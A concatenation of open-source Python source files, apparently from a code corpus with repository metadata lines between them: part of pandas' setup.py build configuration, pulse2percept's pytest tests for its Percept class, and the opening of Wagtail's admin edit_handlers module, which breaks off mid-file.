"""Custom distutils command to clean the .so and .pyc files."""
user_options = [("all", "a", "")]
def initialize_options(self):
self.all = True
self._clean_me = []
self._clean_trees = []
base = pjoin('pandas', '_libs', 'src')
dt = pjoin(base, 'datetime')
src = base
util = pjoin('pandas', 'util')
parser = pjoin(base, 'parser')
ujson_python = pjoin(base, 'ujson', 'python')
ujson_lib = pjoin(base, 'ujson', 'lib')
self._clean_exclude = [pjoin(dt, 'np_datetime.c'),
pjoin(dt, 'np_datetime_strings.c'),
pjoin(src, 'period_helper.c'),
pjoin(parser, 'tokenizer.c'),
pjoin(parser, 'io.c'),
pjoin(ujson_python, 'ujson.c'),
pjoin(ujson_python, 'objToJSON.c'),
pjoin(ujson_python, 'JSONtoObj.c'),
pjoin(ujson_lib, 'ultrajsonenc.c'),
pjoin(ujson_lib, 'ultrajsondec.c'),
pjoin(util, 'move.c'),
]
for root, dirs, files in os.walk('pandas'):
for f in files:
filepath = pjoin(root, f)
if filepath in self._clean_exclude:
continue
if os.path.splitext(f)[-1] in ('.pyc', '.so', '.o',
'.pyo',
'.pyd', '.c', '.orig'):
self._clean_me.append(filepath)
for d in dirs:
if d == '__pycache__':
self._clean_trees.append(pjoin(root, d))
# clean the generated pxi files
for pxifile in _pxifiles:
pxifile = pxifile.replace(".pxi.in", ".pxi")
self._clean_me.append(pxifile)
for d in ('build', 'dist'):
if os.path.exists(d):
self._clean_trees.append(d)
def finalize_options(self):
pass
def run(self):
for clean_me in self._clean_me:
try:
os.unlink(clean_me)
except Exception:
pass
for clean_tree in self._clean_trees:
try:
shutil.rmtree(clean_tree)
except Exception:
pass
# we need to inherit from the versioneer
# class as it encodes the version info
sdist_class = cmdclass['sdist']
class CheckSDist(sdist_class):
"""Custom sdist that ensures Cython has compiled all pyx files to c."""
_pyxfiles = ['pandas/_libs/lib.pyx',
'pandas/_libs/hashtable.pyx',
'pandas/_libs/tslib.pyx',
'pandas/_libs/period.pyx',
'pandas/_libs/index.pyx',
'pandas/_libs/algos.pyx',
'pandas/_libs/join.pyx',
'pandas/_libs/indexing.pyx',
'pandas/_libs/interval.pyx',
'pandas/_libs/hashing.pyx',
'pandas/_libs/missing.pyx',
'pandas/_libs/testing.pyx',
'pandas/_libs/window.pyx',
'pandas/_libs/skiplist.pyx',
'pandas/_libs/sparse.pyx',
'pandas/_libs/parsers.pyx',
'pandas/_libs/tslibs/strptime.pyx',
'pandas/_libs/tslibs/np_datetime.pyx',
'pandas/_libs/tslibs/timedeltas.pyx',
'pandas/_libs/tslibs/timestamps.pyx',
'pandas/_libs/tslibs/timezones.pyx',
'pandas/_libs/tslibs/conversion.pyx',
'pandas/_libs/tslibs/fields.pyx',
'pandas/_libs/tslibs/offsets.pyx',
'pandas/_libs/tslibs/frequencies.pyx',
'pandas/_libs/tslibs/resolution.pyx',
'pandas/_libs/tslibs/parsing.pyx',
'pandas/io/sas/sas.pyx']
def initialize_options(self):
sdist_class.initialize_options(self)
def run(self):
if 'cython' in cmdclass:
self.run_command('cython')
else:
for pyxfile in self._pyxfiles:
cfile = pyxfile[:-3] + 'c'
msg = "C-source file '%s' not found." % (cfile) +\
" Run 'setup.py cython' before sdist."
assert os.path.isfile(cfile), msg
sdist_class.run(self)
class CheckingBuildExt(build_ext):
"""
Subclass build_ext to get clearer report if Cython is necessary.
"""
def check_cython_extensions(self, extensions):
for ext in extensions:
for src in ext.sources:
if not os.path.exists(src):
print("{}: -> [{}]".format(ext.name, ext.sources))
raise Exception("""Cython-generated file '%s' not found.
Cython is required to compile pandas from a development branch.
Please install Cython or download a release package of pandas.
""" % src)
def build_extensions(self):
self.check_cython_extensions(self.extensions)
build_ext.build_extensions(self)
class CythonCommand(build_ext):
"""Custom distutils command subclassed from Cython.Distutils.build_ext
to compile pyx->c, and stop there. All this does is override the
C-compile method build_extension() with a no-op."""
def build_extension(self, ext):
pass
class DummyBuildSrc(Command):
""" numpy's build_src command interferes with Cython's build_ext.
"""
user_options = []
def initialize_options(self):
self.py_modules_dict = {}
def finalize_options(self):
pass
def run(self):
pass
cmdclass.update({'clean': CleanCommand,
'build': build})
try:
from wheel.bdist_wheel import bdist_wheel
class BdistWheel(bdist_wheel):
def get_tag(self):
tag = bdist_wheel.get_tag(self)
repl = 'macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64'
if tag[2] == 'macosx_10_6_intel':
tag = (tag[0], tag[1], repl)
return tag
cmdclass['bdist_wheel'] = BdistWheel
except ImportError:
pass
if cython:
suffix = '.pyx'
cmdclass['build_ext'] = CheckingBuildExt
cmdclass['cython'] = CythonCommand
else:
suffix = '.c'
cmdclass['build_src'] = DummyBuildSrc
cmdclass['build_ext'] = CheckingBuildExt
lib_depends = ['reduce', 'inference']
def srcpath(name=None, suffix='.pyx', subdir='src'):
return pjoin('pandas', subdir, name + suffix)
if suffix == '.pyx':
lib_depends = [srcpath(f, suffix='.pyx', subdir='_libs/src')
for f in lib_depends]
lib_depends.append('pandas/_libs/src/util.pxd')
else:
lib_depends = []
plib_depends = []
common_include = ['pandas/_libs/src/klib', 'pandas/_libs/src']
def pxd(name):
return os.path.abspath(pjoin('pandas', name + '.pxd'))
# args to ignore warnings
if is_platform_windows():
extra_compile_args = []
else:
extra_compile_args = ['-Wno-unused-function']
lib_depends = lib_depends + ['pandas/_libs/src/numpy_helper.h',
'pandas/_libs/src/parse_helper.h',
'pandas/_libs/src/compat_helper.h']
np_datetime_headers = ['pandas/_libs/src/datetime/np_datetime.h',
'pandas/_libs/src/datetime/np_datetime_strings.h']
np_datetime_sources = ['pandas/_libs/src/datetime/np_datetime.c',
'pandas/_libs/src/datetime/np_datetime_strings.c']
tseries_depends = np_datetime_headers + ['pandas/_libs/src/datetime.pxd',
'pandas/_libs/tslibs/np_datetime.pxd']
# some linux distros require it
libraries = ['m'] if not is_platform_windows() else []
ext_data = {
'_libs.algos': {
'pyxfile': '_libs/algos',
'pxdfiles': ['_libs/src/util', '_libs/algos', '_libs/hashtable'],
'depends': _pxi_dep['algos']},
'_libs.groupby': {
'pyxfile': '_libs/groupby',
'pxdfiles': ['_libs/src/util', '_libs/algos'],
'depends': _pxi_dep['groupby']},
'_libs.hashing': {
'pyxfile': '_libs/hashing'},
'_libs.hashtable': {
'pyxfile': '_libs/hashtable',
'pxdfiles': ['_libs/hashtable', '_libs/missing', '_libs/khash'],
'depends': (['pandas/_libs/src/klib/khash_python.h'] +
_pxi_dep['hashtable'])},
'_libs.index': {
'pyxfile': '_libs/index',
'pxdfiles': ['_libs/src/util', '_libs/hashtable'],
'depends': _pxi_dep['index'],
'sources': np_datetime_sources},
'_libs.indexing': {
'pyxfile': '_libs/indexing'},
'_libs.interval': {
'pyxfile': '_libs/interval',
'pxdfiles': ['_libs/hashtable'],
'depends': _pxi_dep['interval']},
'_libs.join': {
'pyxfile': '_libs/join',
'pxdfiles': ['_libs/src/util', '_libs/hashtable'],
'depends': _pxi_dep['join']},
'_libs.lib': {
'pyxfile': '_libs/lib',
'pxdfiles': ['_libs/src/util', '_libs/missing'],
'depends': lib_depends + tseries_depends},
'_libs.missing': {
'pyxfile': '_libs/missing',
'pxdfiles': ['_libs/src/util'],
'depends': tseries_depends},
'_libs.parsers': {
'pyxfile': '_libs/parsers',
'depends': ['pandas/_libs/src/parser/tokenizer.h',
'pandas/_libs/src/parser/io.h',
'pandas/_libs/src/numpy_helper.h'],
'sources': ['pandas/_libs/src/parser/tokenizer.c',
'pandas/_libs/src/parser/io.c']},
'_libs.period': {
'pyxfile': '_libs/period',
'pxdfiles': ['_libs/src/util',
'_libs/lib',
'_libs/tslibs/timedeltas',
'_libs/tslibs/timezones',
'_libs/tslibs/nattype'],
'depends': tseries_depends + ['pandas/_libs/src/period_helper.h'],
'sources': np_datetime_sources + ['pandas/_libs/src/period_helper.c']},
'_libs.properties': {
'pyxfile': '_libs/properties',
'include': []},
'_libs.reshape': {
'pyxfile': '_libs/reshape',
'depends': _pxi_dep['reshape']},
'_libs.skiplist': {
'pyxfile': '_libs/skiplist',
'depends': ['pandas/_libs/src/skiplist.h']},
'_libs.sparse': {
'pyxfile': '_libs/sparse',
'depends': _pxi_dep['sparse']},
'_libs.tslib': {
'pyxfile': '_libs/tslib',
'pxdfiles': ['_libs/src/util',
'_libs/tslibs/conversion',
'_libs/tslibs/timedeltas',
'_libs/tslibs/timestamps',
'_libs/tslibs/timezones',
'_libs/tslibs/nattype'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.conversion': {
'pyxfile': '_libs/tslibs/conversion',
'pxdfiles': ['_libs/src/util',
'_libs/tslibs/nattype',
'_libs/tslibs/timezones',
'_libs/tslibs/timedeltas'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.fields': {
'pyxfile': '_libs/tslibs/fields',
'pxdfiles': ['_libs/tslibs/nattype'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.frequencies': {
'pyxfile': '_libs/tslibs/frequencies',
'pxdfiles': ['_libs/src/util']},
'_libs.tslibs.nattype': {
'pyxfile': '_libs/tslibs/nattype',
'pxdfiles': ['_libs/src/util']},
'_libs.tslibs.np_datetime': {
'pyxfile': '_libs/tslibs/np_datetime',
'depends': np_datetime_headers,
'sources': np_datetime_sources},
'_libs.tslibs.offsets': {
'pyxfile': '_libs/tslibs/offsets',
'pxdfiles': ['_libs/src/util',
'_libs/tslibs/conversion',
'_libs/tslibs/frequencies',
'_libs/tslibs/nattype'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.parsing': {
'pyxfile': '_libs/tslibs/parsing',
'pxdfiles': ['_libs/src/util']},
'_libs.tslibs.resolution': {
'pyxfile': '_libs/tslibs/resolution',
'pxdfiles': ['_libs/src/util',
'_libs/khash',
'_libs/tslibs/frequencies',
'_libs/tslibs/timezones'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.strptime': {
'pyxfile': '_libs/tslibs/strptime',
'pxdfiles': ['_libs/src/util',
'_libs/tslibs/nattype'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.timedeltas': {
'pyxfile': '_libs/tslibs/timedeltas',
'pxdfiles': ['_libs/src/util',
'_libs/tslibs/nattype'],
'depends': np_datetime_headers,
'sources': np_datetime_sources},
'_libs.tslibs.timestamps': {
'pyxfile': '_libs/tslibs/timestamps',
'pxdfiles': ['_libs/src/util',
'_libs/tslibs/conversion',
'_libs/tslibs/nattype',
'_libs/tslibs/timedeltas',
'_libs/tslibs/timezones'],
'depends': tseries_depends,
'sources': np_datetime_sources},
'_libs.tslibs.timezones': {
'pyxfile': '_libs/tslibs/timezones',
'pxdfiles': ['_libs/src/util']},
'_libs.testing': {
'pyxfile': '_libs/testing'},
'_libs.window': {
'pyxfile': '_libs/window',
'pxdfiles': ['_libs/skiplist', '_libs/src/util']},
'io.sas._sas': {
'pyxfile': 'io/sas/sas'}}
extensions = []
for name, data in ext_data.items():
sources = [srcpath(data['pyxfile'], suffix=suffix, subdir='')]
pxds = [pxd(x) for x in data.get('pxdfiles', [])]
if suffix == '.pyx' and pxds:
sources.extend(pxds)
sources.extend(data.get('sources', []))
include = data.get('include', common_include)
obj = Extension('pandas.%s' % name,
sources=sources,
depends=data.get('depends', []),
include_dirs=include,
extra_compile_args=extra_compile_args)
extensions.append(obj)
# ----------------------------------------------------------------------
# msgpack
if sys.byteorder == 'big':
macros = [('__BIG_ENDIAN__', '1')]
else:
macros = [('__LITTLE_ENDIAN__', '1')]
msgpack_include = ['pandas/_libs/src/msgpack'] + common_include
msgpack_suffix = suffix if suffix == '.pyx' else '.cpp'
unpacker_depends = ['pandas/_libs/src/msgpack/unpack.h',
'pandas/_libs/src/msgpack/unpack_define.h',
'pandas/_libs/src/msgpack/unpack_template.h']
packer_ext = Extension('pandas.io.msgpack._packer',
depends=['pandas/_libs/src/msgpack/pack.h',
'pandas/_libs/src/msgpack/pack_template.h'],
sources=[srcpath('_packer',
suffix=msgpack_suffix,
subdir='io/msgpack')],
language='c++',
include_dirs=msgpack_include,
define_macros=macros,
extra_compile_args=extra_compile_args)
unpacker_ext = Extension('pandas.io.msgpack._unpacker',
depends=unpacker_depends,
sources=[srcpath('_unpacker',
suffix=msgpack_suffix,
subdir='io/msgpack')],
language='c++',
include_dirs=msgpack_include,
define_macros=macros,
extra_compile_args=extra_compile_args)
extensions.append(packer_ext)
extensions.append(unpacker_ext)
# ----------------------------------------------------------------------
# ujson
if suffix == '.pyx' and 'setuptools' in sys.modules:
# undo dumb setuptools bug clobbering .pyx sources back to .c
for ext in extensions:
if ext.sources[0].endswith(('.c', '.cpp')):
root, _ = os.path.splitext(ext.sources[0])
ext.sources[0] = root + suffix
ujson_ext = Extension('pandas._libs.json',
depends=['pandas/_libs/src/ujson/lib/ultrajson.h',
'pandas/_libs/src/numpy_helper.h'],
sources=(['pandas/_libs/src/ujson/python/ujson.c',
'pandas/_libs/src/ujson/python/objToJSON.c',
'pandas/_libs/src/ujson/python/JSONtoObj.c',
'pandas/_libs/src/ujson/lib/ultrajsonenc.c',
'pandas/_libs/src/ujson/lib/ultrajsondec.c'] +
np_datetime_sources),
include_dirs=(['pandas/_libs/src/ujson/python',
'pandas/_libs/src/ujson/lib',
'pandas/_libs/src/datetime'] +
common_include),
extra_compile_args=(['-D_GNU_SOURCE'] +
extra_compile_args))
extensions.append(ujson_ext)
# ----------------------------------------------------------------------
# util
# extension for pseudo-safely moving bytes into mutable buffers
_move_ext = Extension('pandas.util._move',
depends=[],
sources=['pandas/util/move.c'])
extensions.append(_move_ext)
if _have_setuptools:
setuptools_kwargs["test_suite"] = "nose.collector"
# The build cache system does string matching below this point.
# if you change something, be careful.
setup(name=DISTNAME,
maintainer=AUTHOR,
version=versioneer.get_version(),
packages=['pandas',
'pandas.api',
'pandas.api.types',
'pandas.compat',
'pandas.compat.numpy',
'pandas.core',
'pandas.core.dtypes',
'pandas.core.indexes',
'pandas.core.computation',
'pandas.core.reshape',
'pandas.core.sparse',
'pandas.core.tools',
'pandas.core.util',
'pandas.computation',
'pandas.errors',
'pandas.formats',
'pandas.io',
'pandas.io.json',
'pandas.io.sas',
'pandas.io.msgpack',
'pandas.io.formats',
'pandas.io.clipboard',
'pandas._libs',
'pandas._libs.tslibs',
'pandas.plotting',
'pandas.stats',
'pandas.types',
'pandas.util',
'pandas.tests',
'pandas.tests.api',
'pandas.tests.dtypes',
'pandas.tests.computation',
'pandas.tests.sparse',
'pandas.tests.frame',
'pandas.tests.generic',
'pandas.tests.indexing',
'pandas.tests.indexes',
'pandas.tests.indexes.datetimes',
'pandas.tests.indexes.timedeltas',
'pandas.tests.indexes.period',
'pandas.tests.internals',
'pandas.tests.io',
'pandas.tests.io.json',
'pandas.tests.io.parser',
'pandas.tests.io.sas',
'pandas.tests.io.msgpack',
'pandas.tests.io.formats',
'pandas.tests.groupby',
'pandas.tests.reshape',
'pandas.tests.series',
'pandas.tests.scalar',
'pandas.tests.tseries',
'pandas.tests.tseries.offsets',
'pandas.tests.plotting',
'pandas.tests.tools',
'pandas.tests.util',
'pandas.tools',
'pandas.tseries',
],
package_data={'pandas.tests': ['data/*.csv'],
'pandas.tests.indexes': ['data/*.pickle'],
'pandas.tests.io': ['data/legacy_hdf/*.h5',
'data/legacy_pickle/*/*.pickle',
'data/legacy_msgpack/*/*.msgpack',
'data/*.csv*',
'data/*.dta',
'data/*.pickle',
'data/*.txt',
'data/*.xls',
'data/*.xlsx',
'data/*.xlsm',
'data/*.table',
'parser/data/*.csv',
'parser/data/*.gz',
'parser/data/*.bz2',
'parser/data/*.txt',
'parser/data/*.tar',
'parser/data/*.zip',
'parser/data/*.tar.gz',
'sas/data/*.csv',
'sas/data/*.xpt',
'sas/data/*.sas7bdat',
'data/*.html',
'data/html_encoding/*.html',
'json/data/*.json*'],
'pandas.tests.io.formats': ['data/*.csv'],
'pandas.tests.io.msgpack': ['data/*.mp'],
'pandas.tests.reshape': ['data/*.csv'],
'pandas.tests.tseries.offsets': ['data/*.pickle'],
'pandas.io.formats': ['templates/*.tpl']
},
ext_modules=extensions,
maintainer_email=EMAIL,
description=DESCRIPTION,
license=LICENSE,
cmdclass=cmdclass,
url=URL,
download_url=DOWNLOAD_URL,
long_description=LONG_DESCRIPTION,
classifiers=CLASSIFIERS,
platforms='any',
**setuptools_kwargs)
|
bsd-3-clause
|
mbeyeler/pulse2percept
|
pulse2percept/percepts/tests/test_base.py
|
1
|
6272
|
import os
import numpy as np
import pytest
import numpy.testing as npt
import matplotlib.pyplot as plt
from matplotlib.axes import Subplot
from matplotlib.animation import FuncAnimation
from imageio import mimread
from skimage import img_as_float
from skimage.io import imread
from pulse2percept.percepts import Percept
from pulse2percept.utils import Grid2D
def test_Percept():
# Automatic axes:
ndarray = np.arange(15).reshape((3, 5, 1))
percept = Percept(ndarray, metadata='meta')
npt.assert_equal(percept.shape, ndarray.shape)
npt.assert_equal(percept.metadata, 'meta')
npt.assert_equal(hasattr(percept, 'xdva'), True)
npt.assert_almost_equal(percept.xdva, np.arange(ndarray.shape[1]))
npt.assert_equal(hasattr(percept, 'ydva'), True)
npt.assert_almost_equal(percept.ydva, np.arange(ndarray.shape[0]))
# Singleton dimensions can be None:
npt.assert_equal(hasattr(percept, 'time'), True)
npt.assert_equal(percept.time, None)
# Specific labels:
percept = Percept(ndarray, time=0.4)
npt.assert_almost_equal(percept.time, [0.4])
percept = Percept(ndarray, time=[0.4])
npt.assert_almost_equal(percept.time, [0.4])
# Labels from a grid.
y_range = (-1, 1)
x_range = (-2, 2)
grid = Grid2D(x_range, y_range)
percept = Percept(ndarray, space=grid)
npt.assert_almost_equal(percept.xdva, grid._xflat)
npt.assert_almost_equal(percept.ydva, grid._yflat)
npt.assert_equal(percept.time, None)
grid = Grid2D(x_range, y_range)
percept = Percept(ndarray, space=grid, time=0)
npt.assert_almost_equal(percept.xdva, grid._xflat)
npt.assert_almost_equal(percept.ydva, grid._yflat)
npt.assert_almost_equal(percept.time, [0])
with pytest.raises(TypeError):
Percept(ndarray, space={'x': [0, 1, 2], 'y': [0, 1, 2, 3, 4]})
def test_Percept__iter__():
ndarray = np.zeros((2, 4, 3))
ndarray[..., 1] = 1
ndarray[..., 2] = 2
percept = Percept(ndarray)
for i, frame in enumerate(percept):
npt.assert_equal(frame.shape, (2, 4))
npt.assert_almost_equal(frame, i)
def test_Percept_argmax():
percept = Percept(np.arange(30).reshape((3, 5, 2)))
npt.assert_almost_equal(percept.argmax(), 29)
npt.assert_almost_equal(percept.argmax(axis="frames"), 1)
with pytest.raises(TypeError):
percept.argmax(axis=(0, 1))
with pytest.raises(ValueError):
percept.argmax(axis='invalid')
def test_Percept_max():
percept = Percept(np.arange(30).reshape((3, 5, 2)))
npt.assert_almost_equal(percept.max(), 29)
npt.assert_almost_equal(percept.max(axis="frames"),
percept.data[..., 1])
npt.assert_almost_equal(percept.max(),
percept.data.ravel()[percept.argmax()])
npt.assert_almost_equal(percept.max(axis='frames'),
percept.data[..., percept.argmax(axis='frames')])
with pytest.raises(TypeError):
percept.max(axis=(0, 1))
with pytest.raises(ValueError):
percept.max(axis='invalid')
def test_Percept_get_brightest_frame():
percept = Percept(np.arange(30).reshape((3, 5, 2)))
npt.assert_almost_equal(percept.get_brightest_frame(),
percept.data[..., 1])
def test_Percept_plot():
y_range = (-1, 1)
x_range = (-2, 2)
grid = Grid2D(x_range, y_range)
percept = Percept(np.arange(15).reshape((3, 5, 1)), space=grid)
# Basic usage of pcolor:
ax = percept.plot(kind='pcolor')
npt.assert_equal(isinstance(ax, Subplot), True)
npt.assert_almost_equal(ax.axis(), [*x_range, *y_range])
frame = percept.get_brightest_frame()
npt.assert_almost_equal(ax.collections[0].get_clim(),
[frame.min(), frame.max()])
# Basic usage of hex:
ax = percept.plot(kind='hex')
npt.assert_equal(isinstance(ax, Subplot), True)
npt.assert_almost_equal(ax.axis(), [percept.xdva[0], percept.xdva[-1],
percept.ydva[0], percept.ydva[-1]])
npt.assert_almost_equal(ax.collections[0].get_clim(),
[percept.data[..., 0].min(),
percept.data[..., 0].max()])
# Verify color map:
npt.assert_equal(ax.collections[0].cmap, plt.cm.gray)
# Specify figsize:
ax = percept.plot(kind='pcolor', figsize=(6, 4))
npt.assert_almost_equal(ax.figure.get_size_inches(), (6, 4))
# Test vmin and vmax
ax.clear()
ax = percept.plot(vmin=2, vmax=4)
npt.assert_equal(ax.collections[0].get_clim(), (2., 4.))
# Invalid calls:
with pytest.raises(ValueError):
percept.plot(kind='invalid')
with pytest.raises(TypeError):
percept.plot(ax='invalid')
@pytest.mark.parametrize('n_frames', (2, 3, 10, 14))
def test_Percept_play(n_frames):
ndarray = np.random.rand(2, 4, n_frames)
percept = Percept(ndarray)
ani = percept.play()
npt.assert_equal(isinstance(ani, FuncAnimation), True)
npt.assert_equal(len(list(ani.frame_seq)), n_frames)
@pytest.mark.parametrize('dtype', (np.float32, np.uint8))
def test_Percept_save(dtype):
ndarray = np.arange(256, dtype=dtype).repeat(31).reshape((-1, 16, 16))
percept = Percept(ndarray.transpose((2, 0, 1)))
# Save multiple frames as a gif or movie:
for fname in ['test.mp4', 'test.avi', 'test.mov', 'test.wmv', 'test.gif']:
print(fname)
percept.save(fname)
npt.assert_equal(os.path.isfile(fname), True)
# Normalized to [0, 255] with some loss of precision:
mov = mimread(fname)
npt.assert_equal(np.min(mov) <= 2, True)
npt.assert_equal(np.max(mov) >= 250, True)
os.remove(fname)
# Cannot save multiple frames image:
fname = 'test.jpg'
with pytest.raises(ValueError):
percept.save(fname)
# But, can save single frame as image:
percept = Percept(ndarray[..., :1])
for fname in ['test.jpg', 'test.png', 'test.tif', 'test.gif']:
percept.save(fname)
npt.assert_equal(os.path.isfile(fname), True)
img = img_as_float(imread(fname))
npt.assert_almost_equal(np.min(img), 0, decimal=3)
npt.assert_almost_equal(np.max(img), 1.0, decimal=3)
os.remove(fname)
|
bsd-3-clause
|
nealtodd/wagtail
|
wagtail/admin/edit_handlers.py
|
2
|
28509
|
import functools
import re
from django import forms
from django.core.exceptions import ImproperlyConfigured
from django.db.models.fields import FieldDoesNotExist
from django.forms.formsets import DELETION_FIELD_NAME, ORDERING_FIELD_NAME
from django.forms.models import fields_for_model
from django.template.loader import render_to_string
from django.utils.functional import cached_property
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy
from taggit.managers import TaggableManager
from wagtail.admin import compare, widgets
from wagtail.core.fields import RichTextField
from wagtail.core.models import Page
from wagtail.core.utils import camelcase_to_underscore, resolve_model_string
from wagtail.utils.decorators import cached_classmethod
# DIRECT_FORM_FIELD_OVERRIDES, FORM_FIELD_OVERRIDES are imported for backwards
# compatibility, as people are likely importing them from here and then
# appending their own overrides
from .forms.models import ( # NOQA
DIRECT_FORM_FIELD_OVERRIDES, FORM_FIELD_OVERRIDES, WagtailAdminModelForm, formfield_for_dbfield)
from .forms.pages import WagtailAdminPageForm
def widget_with_script(widget, script):
return mark_safe('{0}<script>{1}</script>'.format(widget, script))
def get_form_for_model(
model, form_class=WagtailAdminModelForm,
fields=None, exclude=None, formsets=None, exclude_formsets=None, widgets=None
):
# django's modelform_factory with a bit of custom behaviour
attrs = {'model': model}
if fields is not None:
attrs['fields'] = fields
if exclude is not None:
attrs['exclude'] = exclude
if widgets is not None:
attrs['widgets'] = widgets
if formsets is not None:
attrs['formsets'] = formsets
if exclude_formsets is not None:
attrs['exclude_formsets'] = exclude_formsets
# Give this new form class a reasonable name.
class_name = model.__name__ + str('Form')
bases = (object,)
if hasattr(form_class, 'Meta'):
bases = (form_class.Meta,) + bases
form_class_attrs = {
'Meta': type(str('Meta'), bases, attrs)
}
metaclass = type(form_class)
return metaclass(class_name, (form_class,), form_class_attrs)
def extract_panel_definitions_from_model_class(model, exclude=None):
if hasattr(model, 'panels'):
return model.panels
panels = []
_exclude = []
if exclude:
_exclude.extend(exclude)
fields = fields_for_model(model, exclude=_exclude, formfield_callback=formfield_for_dbfield)
for field_name, field in fields.items():
try:
panel_class = field.widget.get_panel()
except AttributeError:
panel_class = FieldPanel
panel = panel_class(field_name)
panels.append(panel)
return panels
class EditHandler:
"""
Abstract class providing sensible default behaviours for objects implementing
the EditHandler API
"""
def __init__(self, heading='', classname='', help_text=''):
self.heading = heading
self.classname = classname
self.help_text = help_text
self.model = None
self.instance = None
self.request = None
self.form = None
def clone(self):
return self.__class__(**self.clone_kwargs())
def clone_kwargs(self):
return {
'heading': self.heading,
'classname': self.classname,
'help_text': self.help_text,
}
# return list of widget overrides that this EditHandler wants to be in place
# on the form it receives
def widget_overrides(self):
return {}
# return list of fields that this EditHandler expects to find on the form
def required_fields(self):
return []
# return a dict of formsets that this EditHandler requires to be present
# as children of the ClusterForm; the dict is a mapping from relation name
# to parameters to be passed as part of get_form_for_model's 'formsets' kwarg
def required_formsets(self):
return {}
# return any HTML that needs to be output on the edit page once per edit handler definition.
# Typically this will be used to define snippets of HTML within <script type="text/x-template"></script> blocks
# for Javascript code to work with.
def html_declarations(self):
return ''
def bind_to(self, model=None, instance=None, request=None, form=None):
if model is None and instance is not None and self.model is None:
model = instance._meta.model
new = self.clone()
new.model = self.model if model is None else model
new.instance = self.instance if instance is None else instance
new.request = self.request if request is None else request
new.form = self.form if form is None else form
if new.model is not None:
new.on_model_bound()
if new.instance is not None:
new.on_instance_bound()
if new.request is not None:
new.on_request_bound()
if new.form is not None:
new.on_form_bound()
return new
def on_model_bound(self):
pass
def on_instance_bound(self):
pass
def on_request_bound(self):
pass
def on_form_bound(self):
pass
def __repr__(self):
return '<%s with model=%s instance=%s request=%s form=%s>' % (
self.__class__.__name__,
self.model, self.instance, self.request, self.form.__class__.__name__)
def classes(self):
"""
Additional CSS classnames to add to whatever kind of object this is at output.
Subclasses of EditHandler should override this, invoking super().classes() to
append more classes specific to the situation.
"""
if self.classname:
return [self.classname]
return []
def field_type(self):
"""
The kind of field it is e.g boolean_field. Useful for better semantic markup of field display based on type
"""
return ""
def id_for_label(self):
"""
The ID to be used as the 'for' attribute of any <label> elements that refer
to this object but are rendered outside of it. Leave blank if this object does not render
as a single input field.
"""
return ""
def render_as_object(self):
"""
Render this object as it should appear within an ObjectList. Should not
include the <h2> heading or help text - ObjectList will supply those
"""
# by default, assume that the subclass provides a catch-all render() method
return self.render()
def render_as_field(self):
"""
Render this object as it should appear within a <ul class="fields"> list item
"""
# by default, assume that the subclass provides a catch-all render() method
return self.render()
def render_missing_fields(self):
"""
Helper function: render all of the fields that are defined on the form but not "claimed" by
any panels via required_fields. These fields are most likely to be hidden fields introduced
by the forms framework itself, such as ORDER / DELETE fields on formset members.
(If they aren't actually hidden fields, then they will appear as ugly unstyled / label-less fields
outside of the panel furniture. But there's not much we can do about that.)
"""
rendered_fields = self.required_fields()
missing_fields_html = [
str(self.form[field_name])
for field_name in self.form.fields
if field_name not in rendered_fields
]
return mark_safe(''.join(missing_fields_html))
def render_form_content(self):
"""
Render this as an 'object', ensuring that all fields necessary for a valid form
submission are included
"""
return mark_safe(self.render_as_object() + self.render_missing_fields())
def get_comparison(self):
return []
class BaseCompositeEditHandler(EditHandler):
"""
Abstract class for EditHandlers that manage a set of sub-EditHandlers.
Concrete subclasses must attach a 'children' property
"""
def __init__(self, children=(), *args, **kwargs):
super().__init__(*args, **kwargs)
self.children = children
def clone_kwargs(self):
kwargs = super().clone_kwargs()
kwargs['children'] = self.children
return kwargs
def widget_overrides(self):
# build a collated version of all its children's widget lists
widgets = {}
for handler_class in self.children:
widgets.update(handler_class.widget_overrides())
widget_overrides = widgets
return widget_overrides
def required_fields(self):
fields = []
for handler in self.children:
fields.extend(handler.required_fields())
return fields
def required_formsets(self):
formsets = {}
for handler_class in self.children:
formsets.update(handler_class.required_formsets())
return formsets
def html_declarations(self):
return mark_safe(''.join([c.html_declarations() for c in self.children]))
def on_model_bound(self):
self.children = [child.bind_to(model=self.model)
for child in self.children]
def on_instance_bound(self):
self.children = [child.bind_to(instance=self.instance)
for child in self.children]
def on_request_bound(self):
self.children = [child.bind_to(request=self.request)
for child in self.children]
def on_form_bound(self):
children = []
for child in self.children:
if isinstance(child, FieldPanel):
if self.form._meta.exclude:
if child.field_name in self.form._meta.exclude:
continue
if self.form._meta.fields:
if child.field_name not in self.form._meta.fields:
continue
children.append(child.bind_to(form=self.form))
self.children = children
def render(self):
return mark_safe(render_to_string(self.template, {
'self': self
}))
def get_comparison(self):
comparators = []
for child in self.children:
comparators.extend(child.get_comparison())
return comparators
class BaseFormEditHandler(BaseCompositeEditHandler):
"""
Base class for edit handlers that can construct a form class for all their
child edit handlers.
"""
# The form class used as the base for constructing specific forms for this
# edit handler. Subclasses can override this attribute to provide a form
# with custom validation, for example. Custom forms must subclass
# WagtailAdminModelForm
base_form_class = None
def get_form_class(self):
"""
Construct a form class that has all the fields and formsets named in
the children of this edit handler.
"""
if self.model is None:
raise AttributeError(
'%s is not bound to a model yet. Use `.bind_to(model=model)` '
'before using this method.' % self.__class__.__name__)
# If a custom form class was passed to the EditHandler, use it.
# Otherwise, use the base_form_class from the model.
# If that is not defined, use WagtailAdminModelForm.
model_form_class = getattr(self.model, 'base_form_class',
WagtailAdminModelForm)
base_form_class = self.base_form_class or model_form_class
return get_form_for_model(
self.model,
form_class=base_form_class,
fields=self.required_fields(),
formsets=self.required_formsets(),
widgets=self.widget_overrides())
class TabbedInterface(BaseFormEditHandler):
template = "wagtailadmin/edit_handlers/tabbed_interface.html"
def __init__(self, *args, **kwargs):
self.base_form_class = kwargs.pop('base_form_class', None)
super().__init__(*args, **kwargs)
def clone_kwargs(self):
kwargs = super().clone_kwargs()
kwargs['base_form_class'] = self.base_form_class
return kwargs
class ObjectList(TabbedInterface):
